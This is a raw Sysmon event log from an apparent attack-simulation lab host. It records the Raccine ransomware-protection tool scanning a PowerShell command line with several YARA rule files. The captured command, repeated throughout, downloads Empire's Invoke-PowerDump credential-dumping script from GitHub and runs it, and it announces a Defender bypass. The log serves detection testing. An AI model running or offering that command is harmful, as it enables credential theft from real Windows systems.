17:24:07.801{9DBE88B5-3BB7-61B2-5105-010000000E02}23687944C:\Windows\system32\conhost.exe{9DBE88B5-3BB7-61B2-5005-010000000E02}4460C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002164087Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:07.789{9DBE88B5-3A8E-61AE-DBA7-000000000E02}44924832C:\Windows\system32\csrss.exe{9DBE88B5-3BB7-61B2-5005-010000000E02}4460C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002164086Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:07.789{9DBE88B5-3BB7-61B2-4805-010000000E02}66124980C:\Program Files\Raccine\Raccine.exe{9DBE88B5-3BB7-61B2-5005-010000000E02}4460C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+127ef|C:\Program Files\Raccine\Raccine.exe+5e97|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002164085Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:07.789{9DBE88B5-3BB7-61B2-5005-010000000E02}4460C:\Program Files\Raccine\yara64.exe-----"C:\Program Files\Raccine\yara64.exe" "C:\Program Files\Raccine\yara\gen_ransomware_command_lines.yar" C:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\RacF32B.tmp -d Name="powershell.exe" -d ExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d CommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' & {Write-Host \''STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON\'' -fore greenSet-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned -ErrorAction IgnoreInvoke-Webrequest -Uri \''https://raw.githubusercontent.com/BC-SECURITY/Empire/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1\'' -UseBasicParsing -OutFile \''$Env:Temp\PowerDump.ps1\''Import-Module \''$Env:Temp\PowerDump.ps1\''Invoke-PowerDump} p} " -d TimeSinceExeCreation=1878 -d ParentName="powershell.exe" -d ParentExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d ParentCommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " -d ParentTimeSinceExeCreation=1878 -d GrandParentName="(unavailable)" -d GrandParentExecutablePath="" -d GrandParentCommandLine="" -d GrandParentTimeSinceExeCreation=0C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E{9DBE88B5-3BB7-61B2-4805-010000000E02}6612C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {Write-Host \""STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON\"" -fore green Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned -ErrorAction Ignore Invoke-Webrequest -Uri \""https://raw.githubusercontent.com/BC-SECURITY/Empire/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1\"" -UseBasicParsing -OutFile \""$Env:Temp\PowerDump.ps1\"" Import-Module \""$Env:Temp\PowerDump.ps1\"" Invoke-PowerDump} 10341000x80000000000000002164082Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:07.772{9DBE88B5-3BB7-61B2-4F05-010000000E02}17685160C:\Windows\system32\conhost.exe{9DBE88B5-3BB7-61B2-4E05-010000000E02}5680C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002164076Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:07.760{9DBE88B5-3A8E-61AE-DBA7-000000000E02}44924832C:\Windows\system32\csrss.exe{9DBE88B5-3BB7-61B2-4E05-010000000E02}5680C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002164075Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:07.760{9DBE88B5-3BB7-61B2-4805-010000000E02}66124980C:\Program Files\Raccine\Raccine.exe{9DBE88B5-3BB7-61B2-4E05-010000000E02}5680C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+127ef|C:\Program Files\Raccine\Raccine.exe+5e97|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002164074Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:07.760{9DBE88B5-3BB7-61B2-4E05-010000000E02}5680C:\Program Files\Raccine\yara64.exe-----"C:\Program Files\Raccine\yara64.exe" "C:\Program Files\Raccine\yara\gen_raccine_kills.yar" C:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\RacF32B.tmp -d Name="powershell.exe" -d ExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d CommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' & {Write-Host \''STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON\'' -fore greenSet-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned -ErrorAction IgnoreInvoke-Webrequest -Uri \''https://raw.githubusercontent.com/BC-SECURITY/Empire/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1\'' -UseBasicParsing -OutFile \''$Env:Temp\PowerDump.ps1\''Import-Module \''$Env:Temp\PowerDump.ps1\''Invoke-PowerDump} p} " -d TimeSinceExeCreation=1878 -d ParentName="powershell.exe" -d ParentExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d ParentCommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " -d ParentTimeSinceExeCreation=1878 -d GrandParentName="(unavailable)" -d GrandParentExecutablePath="" -d GrandParentCommandLine="" -d GrandParentTimeSinceExeCreation=0C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E{9DBE88B5-3BB7-61B2-4805-010000000E02}6612C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {Write-Host \""STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON\"" -fore green Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned -ErrorAction Ignore Invoke-Webrequest -Uri \""https://raw.githubusercontent.com/BC-SECURITY/Empire/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1\"" -UseBasicParsing -OutFile \""$Env:Temp\PowerDump.ps1\"" Import-Module \""$Env:Temp\PowerDump.ps1\"" Invoke-PowerDump} 10341000x80000000000000002164071Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:07.744{9DBE88B5-3BB7-61B2-4D05-010000000E02}28604824C:\Windows\system32\conhost.exe{9DBE88B5-3BB7-61B2-4C05-010000000E02}6556C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002164064Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:07.731{9DBE88B5-3A8E-61AE-DBA7-000000000E02}44926092C:\Windows\system32\csrss.exe{9DBE88B5-3BB7-61B2-4C05-010000000E02}6556C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002164063Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:07.731{9DBE88B5-3BB7-61B2-4805-010000000E02}66124980C:\Program Files\Raccine\Raccine.exe{9DBE88B5-3BB7-61B2-4C05-010000000E02}6556C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+127ef|C:\Program Files\Raccine\Raccine.exe+5e97|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002164062Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:07.731{9DBE88B5-3BB7-61B2-4C05-010000000E02}6556C:\Program Files\Raccine\yara64.exe-----"C:\Program Files\Raccine\yara64.exe" "C:\Program Files\Raccine\yara\gen_powershell_invocation.yar" C:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\RacF32B.tmp -d Name="powershell.exe" -d ExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d CommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' & {Write-Host \''STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON\'' -fore greenSet-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned -ErrorAction IgnoreInvoke-Webrequest -Uri \''https://raw.githubusercontent.com/BC-SECURITY/Empire/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1\'' -UseBasicParsing -OutFile \''$Env:Temp\PowerDump.ps1\''Import-Module \''$Env:Temp\PowerDump.ps1\''Invoke-PowerDump} p} " -d TimeSinceExeCreation=1878 -d ParentName="powershell.exe" -d ParentExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d ParentCommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " -d ParentTimeSinceExeCreation=1878 -d GrandParentName="(unavailable)" -d GrandParentExecutablePath="" -d GrandParentCommandLine="" -d GrandParentTimeSinceExeCreation=0C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E{9DBE88B5-3BB7-61B2-4805-010000000E02}6612C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {Write-Host \""STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON\"" -fore green Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned -ErrorAction Ignore Invoke-Webrequest -Uri \""https://raw.githubusercontent.com/BC-SECURITY/Empire/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1\"" -UseBasicParsing -OutFile \""$Env:Temp\PowerDump.ps1\"" Import-Module \""$Env:Temp\PowerDump.ps1\"" Invoke-PowerDump} 10341000x80000000000000002164059Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:07.711{9DBE88B5-3BB7-61B2-4B05-010000000E02}21327052C:\Windows\system32\conhost.exe{9DBE88B5-3BB7-61B2-4A05-010000000E02}7996C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002164057Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:07.697{9DBE88B5-3A8E-61AE-DBA7-000000000E02}44924832C:\Windows\system32\csrss.exe{9DBE88B5-3BB7-61B2-4A05-010000000E02}7996C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002164052Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:07.696{9DBE88B5-3BB7-61B2-4805-010000000E02}66124980C:\Program Files\Raccine\Raccine.exe{9DBE88B5-3BB7-61B2-4A05-010000000E02}7996C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+127ef|C:\Program Files\Raccine\Raccine.exe+5e97|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002164051Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:07.679{9DBE88B5-3BB7-61B2-4A05-010000000E02}7996C:\Program Files\Raccine\yara64.exe-----"C:\Program Files\Raccine\yara64.exe" "C:\Program Files\Raccine\yara\ext-vars-test.yar" C:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\RacF32B.tmp -d Name="powershell.exe" -d ExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d CommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' & {Write-Host \''STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON\'' -fore greenSet-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned -ErrorAction IgnoreInvoke-Webrequest -Uri \''https://raw.githubusercontent.com/BC-SECURITY/Empire/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1\'' -UseBasicParsing -OutFile \''$Env:Temp\PowerDump.ps1\''Import-Module \''$Env:Temp\PowerDump.ps1\''Invoke-PowerDump} p} " -d TimeSinceExeCreation=1878 -d ParentName="powershell.exe" -d ParentExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d ParentCommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " -d ParentTimeSinceExeCreation=1878 -d GrandParentName="(unavailable)" -d GrandParentExecutablePath="" -d GrandParentCommandLine="" -d GrandParentTimeSinceExeCreation=0C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E{9DBE88B5-3BB7-61B2-4805-010000000E02}6612C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {Write-Host \""STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON\"" -fore green Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned -ErrorAction Ignore Invoke-Webrequest -Uri \""https://raw.githubusercontent.com/BC-SECURITY/Empire/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1\"" -UseBasicParsing -OutFile \""$Env:Temp\PowerDump.ps1\"" Import-Module \""$Env:Temp\PowerDump.ps1\"" Invoke-PowerDump} 10341000x80000000000000002164048Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:07.676{9DBE88B5-3BA0-61B2-4205-010000000E02}39207816C:\Windows\system32\wbem\wmiprvse.exe{9DBE88B5-3BB7-61B2-4805-010000000E02}6612C:\Program Files\Raccine\Raccine.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a583|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d8b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c2c9|C:\Windows\System32\RPCRT4.dll+4a284|C:\Windows\System32\RPCRT4.dll+4919d|C:\Windows\System32\RPCRT4.dll+49cee|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000002164033Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:07.668{9DBE88B5-3BA0-61B2-4205-010000000E02}39207816C:\Windows\system32\wbem\wmiprvse.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a583|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d8b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c2c9|C:\Windows\System32\RPCRT4.dll+4a284|C:\Windows\System32\RPCRT4.dll+4919d|C:\Windows\System32\RPCRT4.dll+49cee|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000002163966Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:07.624{9DBE88B5-C32E-61A8-0C00-000000000E02}8485240C:\Windows\system32\svchost.exe{9DBE88B5-3BB7-61B2-4805-010000000E02}6612C:\Program Files\Raccine\Raccine.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a583|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653ea|C:\Windows\System32\RPCRT4.dll+4a284|C:\Windows\System32\RPCRT4.dll+4919d|C:\Windows\System32\RPCRT4.dll+49a4b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002163964Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:07.619{9DBE88B5-3BA0-61B2-4205-010000000E02}39207816C:\Windows\system32\wbem\wmiprvse.exe{9DBE88B5-3BB7-61B2-4805-010000000E02}6612C:\Program Files\Raccine\Raccine.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a583|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d8b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c2c9|C:\Windows\System32\RPCRT4.dll+4a284|C:\Windows\System32\RPCRT4.dll+4919d|C:\Windows\System32\RPCRT4.dll+49cee|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000002163949Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:07.610{9DBE88B5-3BA0-61B2-4205-010000000E02}39207816C:\Windows\system32\wbem\wmiprvse.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a583|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d8b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c2c9|C:\Windows\System32\RPCRT4.dll+4a284|C:\Windows\System32\RPCRT4.dll+4919d|C:\Windows\System32\RPCRT4.dll+49cee|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000002163880Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:07.568{9DBE88B5-C32E-61A8-0C00-000000000E02}8485240C:\Windows\system32\svchost.exe{9DBE88B5-3BB7-61B2-4805-010000000E02}6612C:\Program Files\Raccine\Raccine.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a583|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653ea|C:\Windows\System32\RPCRT4.dll+4a284|C:\Windows\System32\RPCRT4.dll+4919d|C:\Windows\System32\RPCRT4.dll+49a4b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002163879Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:07.567{9DBE88B5-3BB7-61B2-4805-010000000E02}66124980C:\Program Files\Raccine\Raccine.exe{9DBE88B5-3AAE-61AE-0DA8-000000000E02}6776C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Raccine\Raccine.exe+c914|C:\Program Files\Raccine\Raccine.exe+5894|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002163877Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:07.562{9DBE88B5-3BA0-61B2-4205-010000000E02}39207816C:\Windows\system32\wbem\wmiprvse.exe{9DBE88B5-3BB7-61B2-4805-010000000E02}6612C:\Program Files\Raccine\Raccine.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a583|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d8b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c2c9|C:\Windows\System32\RPCRT4.dll+4a284|C:\Windows\System32\RPCRT4.dll+4919d|C:\Windows\System32\RPCRT4.dll+49cee|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000002163862Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:07.554{9DBE88B5-3BA0-61B2-4205-010000000E02}39207816C:\Windows\system32\wbem\wmiprvse.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program 